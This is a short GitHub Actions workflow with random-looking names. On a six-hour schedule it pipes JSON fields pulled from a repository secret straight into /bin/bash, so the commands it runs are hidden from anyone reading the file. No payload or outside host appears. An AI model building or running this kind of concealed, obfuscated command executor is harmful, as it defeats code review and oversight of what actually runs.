name: wrigglejanus

on:
  workflow_dispatch:
  schedule:
    - cron: '40 2/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: wrigglejanus
        env:
          u2: ${{ secrets.u2 }}
        run: |
          echo $u2 | jq -r .yxoy5448 | /bin/bash
          echo $fni5 | jq -r .olrq113 | /bin/bash
          echo $f9478 | jq -r .znpov14 | /bin/bash
          echo $av6 | jq -r .bmux40595 | /bin/bash
          echo $hqpow75396 | jq -r .gib7222 | /bin/bash

